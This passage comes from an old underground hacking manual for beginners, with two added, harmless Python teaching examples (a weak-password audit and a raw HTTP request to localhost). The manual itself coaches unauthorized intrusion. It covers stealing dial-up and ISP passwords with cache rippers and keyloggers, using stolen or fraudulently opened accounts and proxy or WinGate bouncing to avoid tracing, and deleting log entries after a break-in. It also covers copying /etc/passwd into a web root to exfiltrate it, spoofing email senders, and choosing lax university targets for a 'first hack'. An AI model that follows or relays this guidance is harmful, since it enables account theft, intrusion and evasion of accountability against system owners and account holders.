say, the bigger the dictionary file, the more likely you are to crack passwords. Some
crackers have the option to try every combination of characters possible (instead of using
wordlist files), but this takes time - and is a CPU cycle hog.
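The dictionary check just described, written as the weak-password audit a sysadmin runs over their own password database before anyone else does. This is an added example, not code from the original manual; it uses salted SHA-256 as a stand-in for the DES crypt(3) scheme the text mentions, and the wordlist, usernames and salts are constructed.

```python
"""Weak-password audit: hash every wordlist entry with each account's salt and
compare against the stored hash. Added example, not from the original manual.
Salted SHA-256 stands in for DES crypt(3); the comparison logic is the same."""
import hashlib

# Constructed sample wordlist (stands in for the "thousands of words" file).
WORDLIST = ["password", "secret", "letmein", "dragon", "qwerty", "sunshine"]


def hash_password(password: str, salt: str) -> str:
    """Salted hash stored as 'salt$hexdigest'. Stand-in for crypt(3)."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return f"{salt}${digest}"


def audit_entries(entries: dict, wordlist: list) -> dict:
    """entries maps username -> 'salt$hash'. For each account, hash every
    wordlist word with that account's salt and compare. Returns
    {username: matched_word} for accounts whose password is a plain
    dictionary word.

    Because every entry carries its own salt, the whole wordlist has to be
    re-hashed per account: that per-account cost is exactly what salting
    imposes on a dictionary attack (and on this audit)."""
    weak = {}
    for user, stored in entries.items():
        salt, _ = stored.split("$", 1)
        for word in wordlist:
            if hash_password(word, salt) == stored:
                weak[user] = word
                break
    return weak


# Constructed sample password database: one strong and two weak passwords.
SAMPLE_ENTRIES = {
    "root": hash_password("Tr0ub4dor&3", "ab"),
    "johnh": hash_password("dragon", "Q7"),
    "guest": hash_password("letmein", "xz"),
}

if __name__ == "__main__":
    for user, word in audit_entries(SAMPLE_ENTRIES, WORDLIST).items():
        print(f"{user}: password is the dictionary word '{word}'")
```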
What password cracking program you need depends on the type of password you want to
hack.
UNIX passwords: John the Ripper (for DOS and Windows) and Cracker Jack (for UNIX)
are the most popular crackers for this OS. Many others exist, like a program called Crack,
but JtR and CJ work the best.
NT passwords: L0pht Crack is the most reputable and best NT cracker around. You can
crack sam._ files (the password file), or you can dump the local or remote registry (system
database) and collect the SAM hive right into your L0pht program, and crack 'em that
way. Other NT crackers exist, but don't even come close to the speed and power of LC.
Windows9X passwords: Win9X stores passwords in .pwl files. A johnh.pwl file holds the
encrypted password for user 'johnh.' A handful of crackers for pwl's exist, the best
probably being Glide.
Other types of passwords are Novell Netware passwords, IRC passwords, Wwwboard
passwords, FTP passwords (for standalone ftp servers), and the like - and a password
cracker for each exists - just search the Net.
CGI Vulnerability Scanners
CGI and how to exploit it is explained later in this text. Basically, these scanners look for
CGI scripts on a specified webserver that can be exploited. WebChk is a good one for
Windows, as is Nessus, and SATAN for UNIX. Web-based CGI scanners can sometimes be
found online too, like at infinityzone.cjb.net.
Net BIOS Share scanner
A Share (as explained in the NT section) is a directory available to people on a network.
Share scanners just scan an IP address range or subnet for these shares. This (like any kind
of scanning) can be done manually, but scanner software speeds the process up. WinHack
Gold is a decent share scanner for UNIX, and Legion is a good one for Windows.
Finger Clients
Though fingering (explained later - sorry) can be done manually by telnetting into the
finger port, sometimes it's useful to have a finger client too. UNIX has a built-in client:
just type 'finger.' Clients for Windows include: WS_PingProPack, WS Finger, and HakTek.
Compilers
Most exploits you find (little programs that exploit programming vulnerabilities in
programs) are not compiled, meaning they're still in whatever programming language they were
written in. You'll probably want a perl compiler, and an assembler. Most UNIXes come
with cc and gcc - handy C compilers. In fact, most of your compiling will be done on a
UNIX machine - either your own or a shell account. I promise - all this UNIX, exploit,
vulnerability, and programming stuph will make sense as you read further.
Cache Rippers
Cache rippers are programs that take passwords from the memory of a machine. This doesn't
work on UNIX and NT logon passwords. Rippers are good for looking 'behind' the asterisks
of things like the Dial-Up Networking dialogue box, and getting the passwords. These are
useful only if you're at the machine, and are a good way to filch ISP accounts. Download
Dripper or Revelation and play with them a bit.
Brute Force Programs
Brute force is a simple attack that involves hurling passwords at a system until it cracks.
A brute force program might spit usernames and passwords at a UNIX login prompt, or at
an NT login box. Many exist - the problem is that BFing takes lots of time, and generally
lets the admin of your target know that someone is trying to get in. As explained later,
BFing should be a last resort. Also, the type of BF engine you'll use depends on what
exactly you're trying to break into. For a generic BF program, download Claymore from
TCU's Buffer Overflow section. Brutus (home.cyberarmy.com/tcu/buffer.html) is a good
BF prog for telnet, FTP, and HTTP also.
Trojans, rootkits, and RAT's
Trojans were explained briefly in the Virii section above (due to the misconception that
Trojans are virii). Using Trojans will be explained later. They, rootkits, and RAT's
(Remote Administration Tools) are all similar - they serve as hidden backdoors, and
utilities to remotely control other computers. Examples are SubSeven, Back Orifice, and
Netbus. Installing these on your target computer is usually the last step you'll take in
hacking in. They allow you complete control of the system as well as a way back in later.
Internet Warfare Tools
These are programs with no other use than to wreak havoc. They come in a variety of
categories. DoS (Denial of Service) programs do nothing more than crash servers. Using
these is usually as simple as entering an IP address and hitting enter. Bitch Slap and
WinNuke are good examples of DoS progs. Using these - besides being needlessly
destructive - requires absolutely no intelligence at all, and they are usually used by lame kiddies
who couldn't quite make it as real hackers. The only reason I even bring up Internet
Warfare tools is because it's a good idea to have at least one on hand. Not WinNuke -
programs like Divine Intervention. DI ]|[ has utilities including ping floods, irc floods and
bots, and the like. If you venture into IRC channels, you may occasionally find yourself...
"in a dark alley," and wouldn't want to be unarmed. Keep Net Watcher up - if someone
tries to nuke you - you'll know it.
Sniffers
Sniffers are a very useful tool for the seasoned hacker. In a nutshell, they 'sniff' all (or
some designated) packets that pass it on the network, and record all the data into logfiles
for the hacker to view. Oftentimes hackers sniff password hashes that traverse the
network. How to use and place network sniffers will be gone over later.
Keyloggers
Just that - programs that record keystrokes on a machine. Handy for stealing passwords.
For example - let's say you managed to hack into a Netware box with the account: Guest.
But Guest has just about zero privileges to anything phun. The answer might be to put a
keylogger on that machine and see what turns up.
Specialized Tools
There are a few programs that are more specific in their purpose and use (and therefore
more effective). Here are the biggies that you should eventually have in your collection.
SATAN and SAINT. SATAN (System Administrators Tool for Analyzing Networks) is a
UNIX based exploit scanner. It looks at daemons bound to ports and queries for specific
CGI files to determine possible break-ins for you. Basically, you type the IP address of
your victim, and it scans aggressively for known vulnerabilities. Then, when it finds one, it
prompts you with tutorials on how to exploit it. SAINT is an updated version of
SATAN. These programs are a must for serious hackers, and alone are enough to make
installing UNIX on your computer worthwhile.
Nmap. Network Mapper is also for the UNIX platform. It's a port scanner, but a very
powerful one. Most port scanners simply telnet to every port to see what's open, using
the standard connect() system call. Nmap is capable of a variety of scan types, including
the half-open scan, the Xmas tree scan, and many others. These types of scans don't
telnet to ports. They exploit the way TCP/IP works to report the status of TCP ports
without making a full connection. This is handy for two reasons: one - your IP address
isn't logged since you never made a full connection, and two - these kinds of scans will
pass through some firewalls, allowing you to scan protected computers. Nmap is not for
newbies. You'll need to learn much about TCP/IP (specifically, flags, such as SYN, ACK,
and RST) to understand how Nmap works and how to use it. But don't let this intimidate
you. Install Nmap on your Linux partition and play with it a bit - you'll learn valuable
TCP info. Numerous Nmap text files explain how to use it, along with the manual that
comes with it. This is another must-have for elite hackers. Get it at www.insecure.org.
Nessus. This program is similar to SATAN, but for NT. A variety of plugins exist for
Nessus, which keep it updated on new exploits. When you scan a host with Nessus, it will
tell you what ports and/or CGI scripts are vulnerable, and will give you more info on these
exploits. For more info on what exploits actually are, and how to find and use them, wait
for later sections of this manual.
Keeping from getting caught
Hacking is a gray area, as far as what exactly is legal, and what exactly isn't. Even if you
follow the hacker code of ethics (never harm), you are still quite possibly breaking one or
more laws. Let me just say that if you are already on a system, with someone else's login
name and password, you are blatantly breaking a few laws. Nuking is also illegal. IP and
port scanning are not illegal, though they definitely cause suspicion. In the past, measures
to keep oneself safe included hacking from payphones, splicing your neighbor's line,
'bouncing' your call (explained later), and even using programs such as Modem Jammer.
Now, you might want to use one or more of these methods to keep from being physically
traced (though modem jammers don't work anymore), and another to keep from being
traced over the Internet (to your ISP). The best and probably easiest way to do this is to use
someone else's account, preferably on a different ISP. This is much easier to do than one
might expect. Shouldersurf someone typing in their login/password, do a little social
engineering (explained later), or even brute forcing to get a valid account. There are even
programs out there that, if run on a machine used to access the Internet via a dial-up (with
an ISP), will give you the password. One such example is Dripper (available at The
CyberUnderground). As far as physically tracing you goes, if you are using someone else's
account you are sort of safe. If you have hacked into a system with a low-level account (a
'guest' account, for example) and just got yourself root (see definition above), you should
seriously consider adding a few methods of security before reconnecting. To hack from a
payphone, get an acoustic coupler for your modem, set the receiver on it, and just dial out.
Bouncing your call means basically calling a modem somewhere that is designated as an
'outdial', meaning once connected, any modem commands you issue will go to it, so you
can dial from it somewhere else. If you are traced - it will be to that modem. This can be
defeated though, so it's a good idea to bounce calls off a few outdials. Outdials are pretty
hard to find, but are most common on X.25's and other PSN's (for more info on outdials,
read any other hacking text, like "The Neophite's Guide to Hacking," or "The Newbie's
Handbook").
Shell Account Bouncing
Another security method (similar to bouncing your call) is bouncing your IP attack.
Meaning - telnet to a system that supports telnet itself (usually UNIX) - then telnet to your
target. Finding and obtaining access to one of these is difficult for a new hacker, so I'll go
into greater detail on this later.
Wingates
Another effective method to avoid having your IP address logged on the system you're
connected to (and thereby "busted") is bouncing your packets off a WinGate host.
WinGate is a server software program that acts kind of like a proxy server and firewall all
in one (see above for definitions). As with a generic proxy server, all computers in the
office that the WinGate computer is in connect to it to get to the Internet - and you can do
the same. All you need is the IP address or domain name of a WinGate host. Telnet to it,
and type the IP address you want to get to at the prompt you get. The IP address of the
WinGate box will be logged as you connect - not your own. What's even better is that
WinGates don't log (keep track of) who connects to them. Unless, of course, the
sysadmin uses some third-party software to monitor network traffic. Finding WinGates is
very easy - just go to any hacker website (www.cyberarmy.com is a good one) and look at
their database of WinGates. You'll have to weed through lists of bad WinGates though,
so you may be better off getting a WinGate scanner and doing it yourself. If you're really
smart, you'll bounce your packets off a few WinGates before getting to your target.
Proxies and Anonymizers
If someone is 'using proxies' to be stealthy, he is simply connecting to web pages (and
possibly FTP, Gopher, etc) through a proxy server. Check the description in 'A Little
Hacker Lingo.' Publicly accessible proxies (or proxies that the owner doesn't realize are
accessible by the world) can be connected to and made to proxy all requests. Meaning if you
use proxy1.ozemail.com.au as your proxy server, then surf over to www.yourtarget.com,
you don't directly connect to yourtarget.com. Instead, you connect to
proxy1.ozemail.com.au, inform it that you want to surf yourtarget.com, and it fetches you
that html file. The proxy's IP address is logged on your target during the connection, since
it was the one who actually connected to it, and not your own.
CGI Anonymizers are nothing more than proxy servers as well. www.cyberarmy.com has
an anonymizer for you to surf anonymously with. Also, if you use this URL:
http://proxy-mail/mailcity.lycos.com/bin/redirector.cgi?http://
you can use Mailcity's proxy server to surf anonymously. (These are the proxies used
when you click a link while at Mailcity.) Non-CGI proxies must be entered in your
Internet connection settings (of IE or Netscape).
Filched ISP Accounts
The best way to hide your identity, though, is with a stolen account. Use Dripper or some
other Cache Ripper to get the Dial-Up Networking password from someone you don't
like. Or, sign up for some free ISP service (NetZero, AltaVista Free Access, or WorldSpy)
and give fake account information to get an account that's not attached to you. Make sure
that you're using proxies when you sign up, or they'll know who you are when you sign
up.
Covering Your Tracks
Remember: all computers keep logs of activity. Once you break in, open the logfiles and
delete any entries that involve you (especially ones that logged your IP address). In UNIX
systems, look for logs in /var or /var/adm. In NT, look in \winnt\logs or
\winnt\system32\logfiles or in a directory of a particular service (eg: HTTP or FTP).
Programs also exist that will cover your tracks in logs, such as cloak.c for UNIX (available
at TCU).
As a rule of thumb, the amount of security you should be using is directly related to the
seriousness of your hack. Though, you could be breaking many federal and state laws
without even being close to having root access, and not even quite sure what you are
doing. Always be at least a little paranoid: you'll last longer in the h/p world. It cannot be
stressed enough: be as safe as possible.

TCP/IP and the Client/Server model
If by this point you're completely lost, you might want to read some other basic computer
stuph before venturing on here. If not, roll up your sleeves: you're about to learn the very
heart and soul of the Internet and Hacking today.
TCP/IP
Transfer Control Protocol/Internetwork Protocol. The 'language,' or means for which
packets are exchanged over the Internet, or any intranet. TCP/IP is a set of rules and
regulations that specifically define exactly how data is transferred between computers on a
network. TCP is the upper-level protocols (explained shortly) like Telnet and FTP. IP is
the lower-level protocol, used for routing data over a network. Hence the term 'IP
Address.' TCP/IP has several sub-protocols, known as the TCP/IP protocol suite. To
utilize any of these subprotocols, you just need a client for it. For example, Windows 95
and above has a built-in FTP and Telnet client (a client, when referring to a protocol, is a
program that lets a user utilize that protocol). In this section I will explain each of these
subprotocols, and other protocols used over the internet.
Client/Server
One concept that it is imperative you understand is the Client/Server model. Every
protocol is utilized with software. For example: HTTP (Hyper Text Transfer Protocol, the
protocol used to transfer HTML web pages to and from your computer [this is why it is at
the beginning of URL's you visit] ). This protocol is put to use by software. This
software has two pieces, a client side and a server side. When you type in a URL or click
on a link, you are using an HTTP client software program (a browser) to request a copy of
a particular web page. Then, the server of the URL you requested has HTTP server
software, that receives the request (in the form of data packets), and provides you with a
copy of it, by sending it back to your computer. A server side software package is also
called a service or daemon, and is accessed via TCP ports. A port is a "virtual channel"
used to transfer packets of a specific protocol between a client and a server. When you
hear the term 'portscanning,' what is being referred to is the scanning for protocols, or
services. Also, each port (service installed on the server in question) has a number
assigned to it (eg: telnet is generally number 23). At any rate, think of client side software
as the requestor, and the server side software as the provider. Any time you make a
connection with a machine on the web (with Telnet, Internet Explorer, or whatever), your
client is talking to that server via a common protocol.
TCP Subprotocols, and other Protocols
PPP
There are many protocols, most of which discussed here are used over the Internet's high-speed
digital lines. However, there are lots of protocols used over regular analog phone
lines, used before the Internet was a major computing tool. These include Kermit,
Xmodem, Ymodem, etc, and all have parallels in the TCP/IP protocol suite. However, the
only "analog phone line" one I'll cover is PPP. PPP (Point to Point Protocol) is the
protocol used to connect to your ISP's server, which in turn sends and receives TCP/IP
packets over the internet for you. SLIP is similar, but not as effective or as widely used.
Basically, the way you are able to communicate with the digital network of the Internet is
that your ISP translates TCP/IP packets to PPP (actually encapsulates) so they can travel
over phone lines, and vice versa.
Telnet
Let's start at the basics - on, say, a UNIX platform, there is one or more UNIX boxes - the
computer that does the processing and holds all the data (files, applications, the OS, etc)
which is the computer on the network that you are most likely trying to hack into. Then
there are a slew of dumb terminals directly connected to it. A dumb terminal consists of
nothing more than a monitor and a keyboard - everything a user types/does on a dumb
terminal is handled by the UNIX box. Now, telnet is a protocol/application that allows
people to connect to a computer remotely (over a phone line or the Internet) and process
data locally - meaning when you connect to a UNIX box via telnet, it's just as if you were at
a dumb terminal directly connected to the UNIX box. Telnet is the protocol you will be
using to access the computer you are hacking into. You can also telnet to a port other
than 23. Most client / server protocols send data back and forth with various commands
defined in that protocol. You can telnet to a port and issue these commands by hand, and
the daemon will send commands back to you thinking you're a client. For example, when
you type this in on your browser:
http://home.cyberarmy.com/tcu/underground.html
your browser connects to port 80 (HTTP, the port used for transferring of web pages) of
home.cyberarmy.com and sends this command:
GET /tcu/underground.html
in order to view that web page. You can telnet to port 80, issue the same command, and
you'll get the html file sent to your telnet client (just as it would be sent to your HTTP
client, your browser). Kool, eh?
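The port-80 exchange above, as an added example that is not part of the original manual: a script that speaks HTTP by hand over a plain TCP socket, the way the telnet session described does, and parses what the daemon sends back. It starts a throwaway server on 127.0.0.1 so it runs offline; the page path (/tcu/underground.html) comes from the text, and the page body is constructed.

```python
"""Talk HTTP by hand over a raw socket, client and server side, to show the
client/server model described above. Added example, not from the manual."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample page body served at the path named in the text.
PAGE_PATH = "/tcu/underground.html"
PAGE_BODY = b"<html><body>constructed sample page</body></html>"


class _Handler(BaseHTTPRequestHandler):
    """Server side (the 'daemon' bound to the port): serves one page."""

    def do_GET(self):
        if self.path == PAGE_PATH:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(PAGE_BODY)))
            self.end_headers()
            self.wfile.write(PAGE_BODY)
        else:
            self.send_error(404)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_server():
    """Bind the sample server to a free port on localhost and run it in a thread."""
    server = HTTPServer(("127.0.0.1", 0), _Handler)  # port 0: OS picks a port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def raw_get(host, port, path):
    """Client side: send the GET by hand, exactly as typed into a telnet session
    to port 80, and read until the daemon closes the connection.
    The bare 'GET /path' line shown in the text is HTTP/0.9; modern servers
    expect the version and a Host header, so both are sent here.
    Returns (status_code, headers_dict, body_bytes)."""
    request = (f"GET {path} HTTP/1.0\r\n"
               f"Host: {host}\r\n"
               f"\r\n").encode()
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    raw = b"".join(chunks)
    # Response = status line + headers, blank line, then the html file itself.
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])  # "HTTP/1.0 200 OK" -> 200
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def fetch_demo(path=PAGE_PATH):
    """Start the sample server, fetch path from it by hand, then shut it down."""
    server = start_server()
    try:
        return raw_get("127.0.0.1", server.server_address[1], path)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    status, headers, body = fetch_demo()
    print(status, headers.get("content-type"), body)
```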
FTP
File Transfer Protocol. This is the protocol used to transfer files between computers over
the Internet. Whether you are downloading password files or uploading changes to their
HTML files, you will do it through FTP. To start an FTP session, you need to log in to the
service with an FTP client, just as you would with Telnet. More on this later.
Incidentally, the later browsers from Netscape and Microsoft have an FTP client built in.
To use it, type 'ftp' instead of 'http' in your browser. FTP has more commands than just to
send and receive. Type 'help' to get help from your client, or 'remotehelp' to ask the server
for what commands it accepts. Also, if you telnet to an FTP port, you can log in, but
without the right client that understands the FTP 'language,' you won't be able to transfer
files.
SMTP
Simple Mail Transfer Protocol. This is the protocol used to send and receive email. If you
connect to a SMTP port (by telnetting into it) you can issue SMTP commands. When you
send an email, the protocol's commands travel along with the actual letter. This means that the
SMTP packets (made up of your letter and other protocol-specific data) connect to port
25, and issue the appropriate commands to the SMTP service in order for the letter to
reach its recipient. You can also connect to this port and issue these commands manually.
The use of this could be sending email and changing the sender address to someone else
(possibly the recipient's employer). Also, with the VRFY command, you can find out
whether or not a particular account (login name) exists on the network in question.
In fact, you can telnet to port 25 of a machine and send someone email. Just
enter the commands that an email client would - use the HELP command to familiarize
yourself with the various SMTP commands.
HTTP
Hyper Text Transfer Protocol. This, again, is the protocol used to transfer HTML pages
back and forth between two computers. If you see an open port 80 (www), this machine
has a web site. SSL is the encrypted version of this - see the Crypto section above for
more about SSL.
Finger
This protocol (also a UNIX utility) is used to obtain information about users on a remote
machine. With a finger client, you can see who's logged on currently, and can find specific
information about a specific user. Having finger on a UNIX machine is a very bad idea.
Anyone with a finger client (or anyone who wants to telnet into the finger port) can find
out who's logged in, get a list of users for that computer, and get info on specific users. If
your client can't talk to the daemon, telnet in, and hit enter once or twice. Try typing '@'
or 'finger' or something similar to get a response. Then, type in usernames that you find
and hit enter. All this valuable info, without ever logging in - very useful to the hacker. If
ever you find an open finger port, use it. It could just be the point of entry you were
looking for.
DNS
Domain Name Service. If a computer has this port open, it generally means that this
particular computer is a domain server of that network (the spokesperson, if you will).
These computers act as the spokesman for that particular domain. They hold the DNS
table, which translates hostnames into IP addresses, so when you connect to
www.someserver.com, it knows what IP address you're talking about.
NBT
This stands for Net BIOS over TCP/IP, and is what Windows networks use. Another
name for this is 'nbsession,' (Net BIOS Session Service) which generally indicates Net
BIOS used over a Wide Area Network (such as the Internet), being that Net BIOS by
itself (without TCP/IP) cannot be used over a WAN. This protocol is used in conjunction
with ports 135 and 139. The client for these ports is the Client for Microsoft Networks.
You'll learn how to use it in the NT section.
SNMP
Simple Network Management Protocol. Used to diagnose and manage networks.
Utilities like netstat for UNIX use this lightweight protocol. Certain NT applications of
SNMP are vulnerable - check your local exploit archive for more info.
NCP
Netware Core Protocol. Just that. This isn't a TCP/IP subprotocol. Actually, it's usually
used in conjunction with SPX/IPX (Sequential Packet Exchange, Internetwork Packet
Exchange), Novell's routable protocol.
Net BIOS
This protocol is a very lightweight one, used for smaller LANs. It's not routable (meaning
by itself, cannot be used to connect networks, or used on the Internet), primarily because
network addresses are nothing more than computer names. Windows networking relies
largely on Net BIOS, but it's also used with OSs such as UNIX sometimes.
NetBEUI
Microsoft's NetBEUI (Net BIOS Extended User Interface) is what you're using when you
browse your network neighborhood. NetBEUI uses UNCs (Uniform Name Convention)
to locate resources. A UNC looks like: \\computername\sharename\path. With this format
- you can access any data on your NetBEUI (or TCP/IP - if it's a Windows network)
network. More on this later.
UDP
UDP - Uniform Datagram Protocol. This protocol is actually used in place of TCP for
some applications. TFTP, for example, uses UDP. So does SNMP. UDP encompasses
many subprotocols, just like TCP does - so it's not actually a TCP subprotocol either.
Some network utilities you'll use will actually use UDP (UDP over IP, as opposed to TCP
over IP), but the difference is transparent. Get yourself a networking book for more on
these kinds of things.
POP3 and IMAP
These are used for email. POP3 (Post Office Protocol version 3) stores and retrieves mail
on a server. IMAP requests them - in some cases. For example: when you use Outlook
Express to download your email, you're getting it from a server with POP3 on it. If you
use a web-based email provider such as Hotmail or Mailcity, you view and manipulate it
with IMAP.
SSH and SSL
SSH (Secure Shell) is basically just encrypted telnet sessions. SSL (Secure Socket Layer)
is encrypted HTTP. To use SSL with IE or Netscape, type https:// instead of http://.
AppleTalk and AppleShare
These are not TCP subprotocols. They are used by Mac networks, but can be
implemented over IP (to connect to the Net). The Miscellaneous OSs section goes over
this a little.
These, along with many other protocols, are used regularly over the internet as well. It is
not in the scope of this text to explain them all, so I encourage you to research them and
the others I've covered in more detail.
I could cover pages and pages of TCP/IP stuph. As you gain a bit of experience in this
craft, you will need to learn more about this. For now, just understand that when you do
anything on the Net, whatever program you're using sends packets in the appropriate
command form (TCP/IP commands) across the cable connections that make up the
Internet. And of course, TCP/IP conforms to the OSI model - the backbone of every
network protocol, the way everything communicates digitally. Go out and read about OSI
- you'll appreciate it later.
Getting Started - Your first night as a Newbie
Okay - you've found the network/system that you want to hack. What's first? Find out
which of these protocols the target supports. Can you telnet to this computer? Can you
FTP to it and copy files from it? To find out, you will need to run a portscan on it, with
your portscanning utility. Just type in the URL or IP address of the machine in question,
and start scanning. You will be shown what protocols (TCP/IP subprotocols and others)
the target has. It will not, however, tell you that it supports TCP/IP, because, to put it
simply, it has to have TCP/IP to be on the Internet. What you are looking for here is
services - these TCP/IP subprotocols and other services/ports. Do not let the term port
mislead you - we're not talking about physical ports. If you don't understand this first
step, reread the TCP/IP section.
Now, if the portscan indicated that the target machine supports telnet (port 23), you can
telnet to it, and attempt to log in. Go ahead - try it. You'll need a valid
username/password combo to get in, which we'll get to later.
If port 21 is open, that means that the machine supports FTP, and files can be transferred
back and forth from it. But, like access via telnet, you'll need a login name and password.
A default "anonymous" account is ftp/ftp for a username/password, so go ahead and try
that. If this works (and don't be surprised if it doesn't), you won't have much in the way of
access privileges (meaning you'll be able to look at files, but usually not copy files to your
computer, and most likely not copy files to it). If you can anonymously log on, you at
least have your foot in the door, and can possibly use this as a stair stepping to get further
into the system. More on this later. Once logged on via an FTP port, the commands to jump
around from directory to directory and copy files are very DOS-like (actually more UNIX-like
than DOS, but if you know a little DOS, you should feel comfortable navigating the
system). Type 'help' or '?' for a list of commands. When you do this, you are accessing a
help file on your computer. To access the help file on the computer you're on (which is
usually more extensive and has commands specific to the computer you're logged on to)
type 'rhelp' or 'remotehelp,' or something similar. Or you could telnet to the FTP port and
type 'help.' FTP is the only way to transfer files between the target computer and yours -
which you will need to do to get password files, change their website ('this site has been
hacked by Kurruppt2k'), upload exploits, or whatever. More on this later. One last note
on FTP - you can telnet to an FTP port, and log in. However, since you are not using an
FTP client, you will not be able to do much once inside (like get directory listings or
download files) because your telnet program does not follow the rules and guidelines
(protocol) specified in FTP. Again, you can telnet to any port, but if the right commands
are not issued (usually done by your client program), you may not get anywhere, and may
even be disconnected. Telnetting to ports you aren't sure about, though, is a very
good way to learn about the computer you are targeting, and is usually necessary to break
in.
Now, if your portscan turned up either 'www' or 'http' (port 80), you've found the
computer that holds the HTML files that make up this organization's website. This really
only matters if you are attempting to deface the target's website. To do so, you'll need
write access to the index.html or default.htm file (usually writable only by root, or by
the account the web content is maintained under), and will have to FTP up the page you
want to replace theirs with, and overwrite index.html with your own. Doing this, though,
is cracker-like and malicious. It also tends to piss sysadmins off, and may drive them to
try to find you - so be careful!
A last few notes on TCP/IP. You need to understand the structure of a URL, and of an IP
address. Every computer on the Internet is designated by an address. The addressing
scheme (IPv4) looks something like this: 38.233.203.2. Generally, the very last number is
the node (host) address, and the rest is the network address (depending on the class, or
nowadays the netmask - read a document on IP addressing for more info). Each number
between the dots (called an octet) can be from 0 to 255; the first (.0) and last (.255)
addresses of a network are the network and broadcast addresses, so hosts normally use 1
to 254. So the IP address above is in the 38.233.203.0 network, and the last number
specifies the computer in that network. If you wanted to see what other machines were on
that network, you would scan from 38.233.203.1 to 38.233.203.254. Now, each IP address
can also have a name. If 38.233.203.2 belongs to the netscape.com domain, it might be
www.netscape.com, or mail.netscape.com, or something similar. So when you type
www.netscape.com to visit its website, you could also type http://38.233.203.2 (assuming
that was its IP address).
Which brings us to the URL. Here is a typical "web address":
http://www.microsoft.com/services/windowsNT. The http:// specifies the protocol used.
You could also replace it with ftp:// or even telnet://. (Note: to log in via ftp with your
browser, use ftp://username:password@www.yourtarget.com - but remember that the
password then travels in the clear and ends up in your browser history.) The
www.microsoft.com is just the computer name. DNS handles resolving the name into an IP
address. The /services/windowsNT is the path to the file you are requesting (index.html
or default.htm, if none other is specified), just like a path on your computer (with
forward slashes instead of backslashes).
Webservers have what's called a document root (IIS calls its directory wwwroot). This is
the root of the browsable tree. Meaning the path on the machine itself:
/texts/wwwroot/images/source.gif
on the computer www.gateway.com is reached as:
http://www.gateway.com/images/source.gif
This is important. The root to you, the browser of a webserver, isn't the actual root of
the system's hierarchy. Why? So people browsing can't access the entire machine - just
the web pages and stuff that the webmaster wants you to see. So let's say you cracked a
UNIX machine with a non-root account, and wanted to download the password file of the
Gateway computer above. The file is (in this case) /etc/passwd. To download it, you'd copy
it to /texts/wwwroot (which takes write access to the document root - often granted to
the account that maintains the site). So its actual path is /texts/wwwroot/passwd, but its
URL (to anyone browsing the server) would be http://www.gateway.com/passwd. You'd just
type that into your browser to download the password file, and you're off to cracking it.
Of course, doing this without proxies or a stolen ISP account will get you traced and
busted right away.
Your First Hack
Okay, you now should have enough preliminary knowledge to start your very first hack.
Pick a target. Universities usually have somewhat lax security. Pick something relatively
easy for your first time. Stay away from government networks and those belonging to
large businesses and corporations. The very first step is finding the domain name of your
target. If your target is www.spicegirls.com, the domain name is simply spicegirls.com.
Step one - Intelligence Gathering
Every successful hack starts with a little preliminary investigation. The more information
you have about a specific domain, the better armed you are. Open a notebook and start an
"info collection" on your target. First, visit their website. Try to view every page, and
write down anything of importance. Copy down all email addresses - the part before the @
is usually also a valid login name. Write down anything else of relevance. Look at the
HTML source and see if there are links to other computers you didn't know about. Next run
whois and nslookup on the domain, with your appropriate utility (available at The
CyberUnderground). This will give you very useful information: the domain's nameservers,
the administrator, a few more email addresses, other computers on the network, and other
useful stuff. Copy everything down. Another trick is sending an email to the domain with
a username that you know doesn't exist (e.g. blablabla@yourtarget.com). The SMTP service
of whatever server is designated as the primary mail server of that network will bounce
a letter back to you saying that there is no such user. The headers of this bounce will
also contain useful information - the mail server's hostname, its IP address, and the mail
software and version in the Received: lines - so copy it all down.
Step two - Network Scanning
Next you should try to get a scope of what kinds of computers are on the outside of this
network (by outside, I mean what machines are "on the Internet," and not behind a firewall
or proxy server). To do so, you will scan the subnet with your trusty IP scanner. Again, a
subnet here is every computer (host numbers 1 through 254) in a particular range of IP
addresses. For example, 253.87.8.3 and 253.87.8.45 would be on the same subnet, whereas
253.87.8.45 and 253.87.11.12 are not. (Actually, class C networks are oftentimes broken
up even further with subnet masks, and bigger networks span many of them - read an RFC
on IP to learn all about IP addressing, packet structure, etc.) To scan the subnet of your
target, do as follows. Ping the hostname (your computer should have a ping utility, as do
most of the hacker programs you should already have). This will give you the IP address.
If the IP address is 253.87.8.45, scan the entire subnet, which would be 253.87.8.1
through 253.87.8.254. This will tell you every computer on that subnet that answers -
their IP addresses and hostnames, if applicable (hosts that block ping won't show up,
which is one reason to portscan the quiet addresses too). If you already know of two
computers on different subnets, scan both. Now, write down each computer you found and
their IP addresses, along with any relevant notes. When you're done, you should have a
list of each (or most) of the servers on your target's network that are not behind a
firewall/proxy server, and are accessible to you.
Step Three - Point-of-Entry Determination
Now that you know what servers are on this network, you need to find out what kinds of
computers they are: what OS's they run, and what services are running on each. So what
do you do next? You guessed it - you'll scan for services, or ports, on each computer you
found. Use your portscanner and scan each computer you wrote down. Think of each
service running on a machine as a door that you might be able to break in through.
Below I'll explain methods to use to possibly "break and enter" through each "door."
Now, to get in, and have the power to actually do things and explore the network, you'll
need to telnet (UNIX) or open a NetBIOS/SMB session (NT) to one of the machines. This is
usually the last step of hacking your way in, and you'll need a username and password to
do so (or an exploit, which will be explained shortly). You'll hack into other ports in
order to get these usernames and passwords. Now, a username and password that works on
one machine of the network will often work on all of them (people reuse passwords, and
NIS or an NT domain shares the same accounts across machines), so if you get passwords
from one computer, you can use them on a different one to get in. Also, if there is no
telnet port, you can still (sometimes) log in via FTP. You won't be able to do much (like
run any programs on the computer), but you will be able to look around and upload or
download files. What steps to take here entirely depend on the operating system of your
target. Some networks you'll find will have a variety of OS's, some will have just one.
Here is a list of ways to fingerprint computers - find out what their OS is.
Server Fingerprinting
- If port 23 is open, it's probably UNIX (NT doesn't ship with a telnet server). Telnet to
